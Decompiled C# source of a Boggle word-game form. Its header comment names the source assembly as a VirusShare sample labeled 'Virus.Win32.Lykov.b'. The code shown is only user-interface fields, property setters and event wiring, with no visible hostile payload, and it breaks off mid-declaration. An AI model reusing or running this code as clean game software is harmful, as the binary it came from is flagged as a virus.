// Decompiled with JetBrains decompiler // Type: Boggle.frmMain // Assembly: Boggle, Version=1.0.1320.31511, Culture=neutral, PublicKeyToken=null // MVID: B8BB850A-887A-43B2-B89D-3D1301289D01 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.Win32.Lykov.b-5b4c66fd4c89a7645d7912c18b43ddd7b8db068aa896fea714881ce355eaf833.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.Collections; using System.ComponentModel; using System.Data; using System.Data.OleDb; using System.Diagnostics; using System.Drawing; using System.IO; using System.Runtime.CompilerServices; using System.Text; using System.Threading; using System.Windows.Forms; namespace Boggle { public class frmMain : Form { [AccessedThroughProperty("lbl14")] private CircleLabel _lbl14; [AccessedThroughProperty("BogBorder10")] private BogBorder _BogBorder10; [AccessedThroughProperty("lbl13")] private CircleLabel _lbl13; [AccessedThroughProperty("lbl12")] private CircleLabel _lbl12; [AccessedThroughProperty("lbl15")] private CircleLabel _lbl15; [AccessedThroughProperty("lbl11")] private CircleLabel _lbl11; [AccessedThroughProperty("lbl10")] private CircleLabel _lbl10; [AccessedThroughProperty("lbl9")] private CircleLabel _lbl9; [AccessedThroughProperty("lbl8")] private CircleLabel _lbl8; [AccessedThroughProperty("lbl7")] private CircleLabel _lbl7; [AccessedThroughProperty("lbl6")] private CircleLabel _lbl6; [AccessedThroughProperty("lbl16")] private CircleLabel _lbl16; [AccessedThroughProperty("lbl5")] private CircleLabel _lbl5; [AccessedThroughProperty("BogBorder11")] private BogBorder _BogBorder11; [AccessedThroughProperty("btnAddWord")] private BogButton _btnAddWord; [AccessedThroughProperty("lbl2")] private CircleLabel _lbl2; [AccessedThroughProperty("lbl3")] private CircleLabel _lbl3; [AccessedThroughProperty("mnuMain")] private MainMenu _mnuMain; [AccessedThroughProperty("lbl4")] private CircleLabel _lbl4; [AccessedThroughProperty("BogBorder12")] private BogBorder _BogBorder12; [AccessedThroughProperty("lbl1")] private CircleLabel _lbl1; [AccessedThroughProperty("BogBorder8")] private BogBorder _BogBorder8; [AccessedThroughProperty("BogBorder13")] private BogBorder _BogBorder13; [AccessedThroughProperty("BogBorder7")] private BogBorder _BogBorder7; [AccessedThroughProperty("mnuGame")] private MenuItem _mnuGame; [AccessedThroughProperty("BogBorder6")] private BogBorder _BogBorder6; [AccessedThroughProperty("BogBorder14")] private BogBorder _BogBorder14; [AccessedThroughProperty("BogBorder2")] private BogBorder _BogBorder2; [AccessedThroughProperty("BogBorder15")] private BogBorder _BogBorder15; [AccessedThroughProperty("Panel1")] private Panel _Panel1; [AccessedThroughProperty("mnuNewGame")] private MenuItem _mnuNewGame; [AccessedThroughProperty("mnuExitGame")] private MenuItem _mnuExitGame; [AccessedThroughProperty("BogBorder16")] private BogBorder _BogBorder16; [AccessedThroughProperty("mnuOptions")] private MenuItem _mnuOptions; [AccessedThroughProperty("txtWordFound")] private TextBox _txtWordFound; [AccessedThroughProperty("lstHumanWordsFound")] private ListBox _lstHumanWordsFound; [AccessedThroughProperty("mnuHelp")] private MenuItem _mnuHelp; [AccessedThroughProperty("tmrContMain")] private System.Windows.Forms.Timer _tmrContMain; [AccessedThroughProperty("tmrMain")] private BogTimer _tmrMain; [AccessedThroughProperty("picCubeDown")] private PictureBox _picCubeDown; [AccessedThroughProperty("lstCompFoundWords")] private ListBox _lstCompFoundWords; [AccessedThroughProperty("tmrBtn1")] private Button _tmrBtn1; [AccessedThroughProperty("tmrBtn2")] private Button _tmrBtn2; [AccessedThroughProperty("tmrBtn3")] private Button _tmrBtn3; [AccessedThroughProperty("CircleLabel3")] private CircleLabel _CircleLabel3; [AccessedThroughProperty("CircleLabel2")] private CircleLabel _CircleLabel2; [AccessedThroughProperty("CircleLabel1")] private CircleLabel _CircleLabel1; [AccessedThroughProperty("PictureBox1")] private PictureBox _PictureBox1; [AccessedThroughProperty("picCubesUp")] private PictureBox _picCubesUp; [AccessedThroughProperty("Label4")] private Label _Label4; [AccessedThroughProperty("BogBorder1")] private BogBorder _BogBorder1; [AccessedThroughProperty("Label3")] private Label _Label3; [AccessedThroughProperty("BogBorder3")] private BogBorder _BogBorder3; [AccessedThroughProperty("Label2")] private Label _Label2; [AccessedThroughProperty("BogBorder4")] private BogBorder _BogBorder4; [AccessedThroughProperty("Label1")] private Label _Label1; [AccessedThroughProperty("txtMain")] private RichTextBox _txtMain; [AccessedThroughProperty("Panel2")] private Panel _Panel2; [AccessedThroughProperty("tmrBtn4")] private Button _tmrBtn4; [AccessedThroughProperty("Panel3")] private Panel _Panel3; [AccessedThroughProperty("BogBorder5")] private BogBorder _BogBorder5; [AccessedThroughProperty("Label6")] private Label _Label6; [AccessedThroughProperty("lblRound")] private Label _lblRound; [AccessedThroughProperty("Label8")] private Label _Label8; [AccessedThroughProperty("Label7")] private Label _Label7; [AccessedThroughProperty("lblComputerRounds")] private Label _lblComputerRounds; [AccessedThroughProperty("Label5")] private Label _Label5; [AccessedThroughProperty("lblHumanRounds")] private Label _lblHumanRounds; [AccessedThroughProperty("MenuItem8")] private MenuItem _MenuItem8; [AccessedThroughProperty("lblHumanScore")] private Label _lblHumanScore; [AccessedThroughProperty("mnuHighScores")] private MenuItem _mnuHighScores; [AccessedThroughProperty("lblCompScore")] private Label _lblCompScore; [AccessedThroughProperty("lblHumanWordsCount")] private Label _lblHumanWordsCount; [AccessedThroughProperty("lblCompWordsCount")] private Label _lblCompWordsCount; [AccessedThroughProperty("mnuTips")] private MenuItem _mnuTips; [AccessedThroughProperty("pnlCubes")] private BogPanel _pnlCubes; [AccessedThroughProperty("pnlTimer")] private BogPanel _pnlTimer; [AccessedThroughProperty("pnlScore")] private BogPanel _pnlScore; [AccessedThroughProperty("MenuItem6")] private MenuItem _MenuItem6; [AccessedThroughProperty("btnFinish")] private BogButton _btnFinish; [AccessedThroughProperty("pnlWords")] private BogPanel _pnlWords; [AccessedThroughProperty("mnuEnableWordValidation")] private MenuItem _mnuEnableWordValidation; [AccessedThroughProperty("MenuItem5")] private MenuItem _MenuItem5; [AccessedThroughProperty("btnScramble")] private BogButton _btnScramble; [AccessedThroughProperty("mnuMode")] private MenuItem _mnuMode; [AccessedThroughProperty("btnContinue")] private BogButton _btnContinue; [AccessedThroughProperty("mnuEnableTimerFlash")] private MenuItem _mnuEnableTimerFlash; [AccessedThroughProperty("mnuTmr500")] private MenuItem _mnuTmr500; [AccessedThroughProperty("mnuBoardGameMode")] private MenuItem _mnuBoardGameMode; [AccessedThroughProperty("mnuTmr430")] private MenuItem _mnuTmr430; [AccessedThroughProperty("mnuTmr400")] private MenuItem _mnuTmr400; [AccessedThroughProperty("mnuTmr330")] private MenuItem _mnuTmr330; [AccessedThroughProperty("mnuTmr300")] private MenuItem _mnuTmr300; [AccessedThroughProperty("mnuVsMode")] private MenuItem _mnuVsMode; [AccessedThroughProperty("mnuTmr230")] private MenuItem _mnuTmr230; [AccessedThroughProperty("mnuTmr200")] private MenuItem _mnuTmr200; [AccessedThroughProperty("mnuTmr130")] private MenuItem _mnuTmr130; [AccessedThroughProperty("BogBorder9")] private BogBorder _BogBorder9; [AccessedThroughProperty("mnuTeachingMode")] private MenuItem _mnuTeachingMode; [AccessedThroughProperty("mnuTmr100")] private MenuItem _mnuTmr100; [AccessedThroughProperty("mnuTmr30")] private MenuItem _mnuTmr30; [AccessedThroughProperty("mnuTimerInterval")] private MenuItem _mnuTimerInterval; [AccessedThroughProperty("mnuEndGame")] private MenuItem _mnuEndGame; [AccessedThroughProperty("MenuItem4")] private MenuItem _MenuItem4; [AccessedThroughProperty("mnuLevelImpossible")] private MenuItem _mnuLevelImpossible; [AccessedThroughProperty("mnuLevelHard")] private MenuItem _mnuLevelHard; [AccessedThroughProperty("mnuLevelMedium")] private MenuItem _mnuLevelMedium; [AccessedThroughProperty("MenuItem2")] private MenuItem _MenuItem2; [AccessedThroughProperty("mnuLevelEasy")] private MenuItem _mnuLevelEasy; [AccessedThroughProperty("MenuItem3")] private MenuItem _MenuItem3; [AccessedThroughProperty("mnuAbout")] private MenuItem _mnuAbout; [AccessedThroughProperty("MenuItem1")] private MenuItem _MenuItem1; [AccessedThroughProperty("mnuEnableDefSearch")] private MenuItem _mnuEnableDefSearch; private IContainer components; public DataTable FoundWords; public string[] WordsChosen; public Thread ShowWordThread; public Thread ShowTextThread; public Thread FindWordsThread; public double ScramSec; public bool LoadTextShown; public int Min; public double Sec; public int Round; public int ComputerRounds; public int HumanRounds; public int HumanScore; public int ComputerScore; [SpecialName] private bool \u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024TimerGoing; [SpecialName] private bool[,] \u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection; [SpecialName] private int \u0024STATIC\u0024tmrContMain_Tick\u002420211C1211\u0024LoadWaitTime; [SpecialName] private StaticLocalInitFlag \u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init; [STAThread] public static void Main() => Application.Run((Form) new frmMain()); internal virtual Label Label1 { get => this._Label1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label1 == null) ; this._Label1 = value; if (this._Label1 == null) ; } } internal virtual Label Label2 { get => this._Label2; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label2 == null) ; this._Label2 = value; if (this._Label2 == null) ; } } internal virtual Label Label3 { get => this._Label3; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label3 == null) ; this._Label3 = value; if (this._Label3 == null) ; } } internal virtual Label Label4 { get => this._Label4; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label4 == null) ; this._Label4 = value; if (this._Label4 == null) ; } } internal virtual PictureBox PictureBox1 { get => this._PictureBox1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._PictureBox1 == null) ; this._PictureBox1 = value; if (this._PictureBox1 == null) ; } } internal virtual Label Label5 { get => this._Label5; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label5 == null) ; this._Label5 = value; if (this._Label5 == null) ; } } internal virtual BogBorder BogBorder2 { get => this._BogBorder2; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder2 == null) ; this._BogBorder2 = value; if (this._BogBorder2 == null) ; } } internal virtual BogBorder BogBorder6 { get => this._BogBorder6; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder6 == null) ; this._BogBorder6 = value; if (this._BogBorder6 == null) ; } } internal virtual BogBorder BogBorder7 { get => this._BogBorder7; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder7 == null) ; this._BogBorder7 = value; if (this._BogBorder7 == null) ; } } internal virtual BogBorder BogBorder8 { get => this._BogBorder8; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder8 == null) ; this._BogBorder8 = value; if (this._BogBorder8 == null) ; } } internal virtual CircleLabel lbl1 { get => this._lbl1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl1 != null) this._lbl1.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl1 = value; if (this._lbl1 == null) return; this._lbl1.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl4 { get => this._lbl4; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl4 != null) this._lbl4.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl4 = value; if (this._lbl4 == null) return; this._lbl4.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl3 { get => this._lbl3; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl3 != null) this._lbl3.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl3 = value; if (this._lbl3 == null) return; this._lbl3.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel CircleLabel3 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._CircleLabel3 == null) ; this._CircleLabel3 = value; if (this._CircleLabel3 == null) ; } get => this._CircleLabel3; } internal virtual CircleLabel lbl2 { get => this._lbl2; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl2 != null) this._lbl2.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl2 = value; if (this._lbl2 == null) return; this._lbl2.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl5 { get => this._lbl5; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl5 != null) this._lbl5.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl5 = value; if (this._lbl5 == null) return; this._lbl5.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl6 { get => this._lbl6; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl6 != null) this._lbl6.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl6 = value; if (this._lbl6 == null) return; this._lbl6.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl7 { get => this._lbl7; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl7 != null) this._lbl7.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl7 = value; if (this._lbl7 == null) return; this._lbl7.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel CircleLabel2 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._CircleLabel2 == null) ; this._CircleLabel2 = value; if (this._CircleLabel2 == null) ; } get => this._CircleLabel2; } internal virtual CircleLabel lbl8 { get => this._lbl8; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl8 != null) this._lbl8.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl8 = value; if (this._lbl8 == null) return; this._lbl8.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl9 { get => this._lbl9; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl9 != null) this._lbl9.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl9 = value; if (this._lbl9 == null) return; this._lbl9.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl10 { get => this._lbl10; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl10 != null) this._lbl10.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl10 = value; if (this._lbl10 == null) return; this._lbl10.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel CircleLabel1 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._CircleLabel1 == null) ; this._CircleLabel1 = value; if (this._CircleLabel1 == null) ; } get => this._CircleLabel1; } internal virtual CircleLabel lbl11 { get => this._lbl11; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl11 != null) this._lbl11.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl11 = value; if (this._lbl11 == null) return; this._lbl11.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl12 { get => this._lbl12; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl12 != null) this._lbl12.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl12 = value; if (this._lbl12 == null) return; this._lbl12.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl13 { get => this._lbl13; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl13 != null) this._lbl13.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl13 = value; if (this._lbl13 == null) return; this._lbl13.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual PictureBox picCubesUp { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._picCubesUp != null) this._picCubesUp.Paint -= new PaintEventHandler(this.picCubesUp_Paint); this._picCubesUp = value; if (this._picCubesUp == null) return; this._picCubesUp.Paint += new PaintEventHandler(this.picCubesUp_Paint); } get => this._picCubesUp; } internal virtual CircleLabel lbl14 { get => this._lbl14; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl14 != null) this._lbl14.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl14 = value; if (this._lbl14 == null) return; this._lbl14.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl15 { get => this._lbl15; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl15 != null) this._lbl15.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl15 = value; if (this._lbl15 == null) return; this._lbl15.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual CircleLabel lbl16 { get => this._lbl16; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lbl16 != null) this._lbl16.CubeClick -= new CircleLabel.CubeClickEventHandler(this.CubeClick); this._lbl16 = value; if (this._lbl16 == null) return; this._lbl16.CubeClick += new CircleLabel.CubeClickEventHandler(this.CubeClick); } } internal virtual BogButton btnAddWord { get => this._btnAddWord; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._btnAddWord != null) this._btnAddWord.Click -= new EventHandler(this.btnAddWord_Click); this._btnAddWord = value; if (this._btnAddWord == null) return; this._btnAddWord.Click += new EventHandler(this.btnAddWord_Click); } } internal virtual BogBorder BogBorder1 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder1 == null) ; this._BogBorder1 = value; if (this._BogBorder1 == null) ; } get => this._BogBorder1; } internal virtual MainMenu mnuMain { get => this._mnuMain; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuMain == null) ; this._mnuMain = value; if (this._mnuMain == null) ; } } internal virtual MenuItem mnuGame { get => this._mnuGame; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuGame == null) ; this._mnuGame = value; if (this._mnuGame == null) ; } } internal virtual MenuItem mnuNewGame { get => this._mnuNewGame; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuNewGame != null) this._mnuNewGame.Click -= new EventHandler(this.mnuNewGame_Click); this._mnuNewGame = value; if (this._mnuNewGame == null) return; this._mnuNewGame.Click += new EventHandler(this.mnuNewGame_Click); } } internal virtual BogBorder BogBorder3 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder3 == null) ; this._BogBorder3 = value; if (this._BogBorder3 == null) ; } get => this._BogBorder3; } internal virtual MenuItem mnuExitGame { get => this._mnuExitGame; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuExitGame != null) this._mnuExitGame.Click -= new EventHandler(this.mnuExitGame_Click); this._mnuExitGame = value; if (this._mnuExitGame == null) return; this._mnuExitGame.Click += new EventHandler(this.mnuExitGame_Click); } } internal virtual MenuItem mnuOptions { get => this._mnuOptions; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuOptions == null) ; this._mnuOptions = value; if (this._mnuOptions == null) ; } } internal virtual MenuItem mnuHelp { get => this._mnuHelp; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuHelp == null) ; this._mnuHelp = value; if (this._mnuHelp == null) ; } } internal virtual BogBorder BogBorder4 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder4 == null) ; this._BogBorder4 = value; if (this._BogBorder4 == null) ; } get => this._BogBorder4; } internal virtual System.Windows.Forms.Timer tmrContMain { get => this._tmrContMain; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrContMain != null) this._tmrContMain.Tick -= new EventHandler(this.tmrContMain_Tick); this._tmrContMain = value; if (this._tmrContMain == null) return; this._tmrContMain.Tick += new EventHandler(this.tmrContMain_Tick); } } internal virtual BogTimer tmrMain { get => this._tmrMain; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrMain == null) ; this._tmrMain = value; if (this._tmrMain == null) ; } } internal virtual PictureBox picCubeDown { get => this._picCubeDown; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._picCubeDown == null) ; this._picCubeDown = value; if (this._picCubeDown == null) ; } } internal virtual ListBox lstHumanWordsFound { get => this._lstHumanWordsFound; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lstHumanWordsFound != null) this._lstHumanWordsFound.MouseUp -= new MouseEventHandler(this.lstHumanWordsFound_MouseUp); this._lstHumanWordsFound = value; if (this._lstHumanWordsFound == null) return; this._lstHumanWordsFound.MouseUp += new MouseEventHandler(this.lstHumanWordsFound_MouseUp); } } internal virtual RichTextBox txtMain { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._txtMain == null) ; this._txtMain = value; if (this._txtMain == null) ; } get => this._txtMain; } internal virtual TextBox txtWordFound { get => this._txtWordFound; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._txtWordFound != null) this._txtWordFound.KeyPress -= new KeyPressEventHandler(this.txtWordFound_KeyPress); this._txtWordFound = value; if (this._txtWordFound == null) return; this._txtWordFound.KeyPress += new KeyPressEventHandler(this.txtWordFound_KeyPress); } } internal virtual Panel Panel1 { get => this._Panel1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Panel1 == null) ; this._Panel1 = value; if (this._Panel1 == null) ; } } internal virtual BogBorder BogBorder9 { get => this._BogBorder9; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder9 == null) ; this._BogBorder9 = value; if (this._BogBorder9 == null) ; } } internal virtual Panel Panel2 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Panel2 == null) ; this._Panel2 = value; if (this._Panel2 == null) ; } get => this._Panel2; } internal virtual BogBorder BogBorder10 { get => this._BogBorder10; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder10 == null) ; this._BogBorder10 = value; if (this._BogBorder10 == null) ; } } internal virtual BogBorder BogBorder11 { get => this._BogBorder11; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder11 == null) ; this._BogBorder11 = value; if (this._BogBorder11 == null) ; } } internal virtual BogBorder BogBorder12 { get => this._BogBorder12; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder12 == null) ; this._BogBorder12 = value; if (this._BogBorder12 == null) ; } } internal virtual Panel Panel3 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Panel3 == null) ; this._Panel3 = value; if (this._Panel3 == null) ; } get => this._Panel3; } internal virtual BogBorder BogBorder13 { get => this._BogBorder13; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder13 == null) ; this._BogBorder13 = value; if (this._BogBorder13 == null) ; } } internal virtual BogBorder BogBorder14 { get => this._BogBorder14; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder14 == null) ; this._BogBorder14 = value; if (this._BogBorder14 == null) ; } } internal virtual BogBorder BogBorder15 { get => this._BogBorder15; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder15 == null) ; this._BogBorder15 = value; if (this._BogBorder15 == null) ; } } internal virtual BogBorder BogBorder16 { get => this._BogBorder16; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder16 == null) ; this._BogBorder16 = value; if (this._BogBorder16 == null) ; } } internal virtual BogBorder BogBorder5 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._BogBorder5 == null) ; this._BogBorder5 = value; if (this._BogBorder5 == null) ; } get => this._BogBorder5; } internal virtual ListBox lstCompFoundWords { get => this._lstCompFoundWords; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lstCompFoundWords != null) this._lstCompFoundWords.MouseUp -= new MouseEventHandler(this.lstCompFoundWords_MouseUp); this._lstCompFoundWords = value; if (this._lstCompFoundWords == null) return; this._lstCompFoundWords.MouseUp += new MouseEventHandler(this.lstCompFoundWords_MouseUp); } } internal virtual Button tmrBtn1 { get => this._tmrBtn1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrBtn1 != null) this._tmrBtn1.Click -= new EventHandler(this.tmrBtn1_Click_1); this._tmrBtn1 = value; if (this._tmrBtn1 == null) return; this._tmrBtn1.Click += new EventHandler(this.tmrBtn1_Click_1); } } internal virtual Button tmrBtn2 { get => this._tmrBtn2; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrBtn2 != null) this._tmrBtn2.Click -= new EventHandler(this.tmrBtn1_Click_1); this._tmrBtn2 = value; if (this._tmrBtn2 == null) return; this._tmrBtn2.Click += new EventHandler(this.tmrBtn1_Click_1); } } internal virtual Label Label6 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label6 == null) ; this._Label6 = value; if (this._Label6 == null) ; } get => this._Label6; } internal virtual Button tmrBtn3 { get => this._tmrBtn3; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrBtn3 != null) this._tmrBtn3.Click -= new EventHandler(this.tmrBtn1_Click_1); this._tmrBtn3 = value; if (this._tmrBtn3 == null) return; this._tmrBtn3.Click += new EventHandler(this.tmrBtn1_Click_1); } } internal virtual Button tmrBtn4 { get => this._tmrBtn4; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._tmrBtn4 != null) this._tmrBtn4.Click -= new EventHandler(this.tmrBtn1_Click_1); this._tmrBtn4 = value; if (this._tmrBtn4 == null) return; this._tmrBtn4.Click += new EventHandler(this.tmrBtn1_Click_1); } } internal virtual Label lblHumanScore { get => this._lblHumanScore; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblHumanScore == null) ; this._lblHumanScore = value; if (this._lblHumanScore == null) ; } } internal virtual Label lblRound { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblRound == null) ; this._lblRound = value; if (this._lblRound == null) ; } get => this._lblRound; } internal virtual Label lblCompScore { get => this._lblCompScore; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblCompScore == null) ; this._lblCompScore = value; if (this._lblCompScore == null) ; } } internal virtual Label lblHumanWordsCount { get => this._lblHumanWordsCount; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblHumanWordsCount == null) ; this._lblHumanWordsCount = value; if (this._lblHumanWordsCount == null) ; } } internal virtual Label lblCompWordsCount { get => this._lblCompWordsCount; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblCompWordsCount == null) ; this._lblCompWordsCount = value; if (this._lblCompWordsCount == null) ; } } internal virtual BogPanel pnlCubes { get => this._pnlCubes; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._pnlCubes == null) ; this._pnlCubes = value; if (this._pnlCubes == null) ; } } internal virtual Label Label8 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label8 == null) ; this._Label8 = value; if (this._Label8 == null) ; } get => this._Label8; } internal virtual BogPanel pnlTimer { get => this._pnlTimer; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._pnlTimer == null) ; this._pnlTimer = value; if (this._pnlTimer == null) ; } } internal virtual BogPanel pnlScore { get => this._pnlScore; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._pnlScore == null) ; this._pnlScore = value; if (this._pnlScore == null) ; } } internal virtual BogPanel pnlWords { get => this._pnlWords; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._pnlWords == null) ; this._pnlWords = value; if (this._pnlWords == null) ; } } internal virtual Label Label7 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._Label7 == null) ; this._Label7 = value; if (this._Label7 == null) ; } get => this._Label7; } internal virtual MenuItem mnuMode { get => this._mnuMode; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuMode == null) ; this._mnuMode = value; if (this._mnuMode == null) ; } } internal virtual MenuItem mnuBoardGameMode { get => this._mnuBoardGameMode; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuBoardGameMode != null) this._mnuBoardGameMode.Click -= new EventHandler(this.ChangeMode); this._mnuBoardGameMode = value; if (this._mnuBoardGameMode == null) return; this._mnuBoardGameMode.Click += new EventHandler(this.ChangeMode); } } internal virtual MenuItem mnuVsMode { get => this._mnuVsMode; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuVsMode != null) this._mnuVsMode.Click -= new EventHandler(this.ChangeMode); this._mnuVsMode = value; if (this._mnuVsMode == null) return; this._mnuVsMode.Click += new EventHandler(this.ChangeMode); } } internal virtual Label lblComputerRounds { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblComputerRounds == null) ; this._lblComputerRounds = value; if (this._lblComputerRounds == null) ; } get => this._lblComputerRounds; } internal virtual MenuItem mnuTeachingMode { get => this._mnuTeachingMode; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTeachingMode != null) this._mnuTeachingMode.Click -= new EventHandler(this.ChangeMode); this._mnuTeachingMode = value; if (this._mnuTeachingMode == null) return; this._mnuTeachingMode.Click += new EventHandler(this.ChangeMode); } } internal virtual MenuItem mnuEndGame { get => this._mnuEndGame; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuEndGame != null) this._mnuEndGame.Click -= new EventHandler(this.mnuEndGame_Click); this._mnuEndGame = value; if (this._mnuEndGame == null) return; this._mnuEndGame.Click += new EventHandler(this.mnuEndGame_Click); } } internal virtual MenuItem MenuItem2 { get => this._MenuItem2; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem2 == null) ; this._MenuItem2 = value; if (this._MenuItem2 == null) ; } } internal virtual MenuItem MenuItem1 { get => this._MenuItem1; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem1 == null) ; this._MenuItem1 = value; if (this._MenuItem1 == null) ; } } internal virtual Label lblHumanRounds { 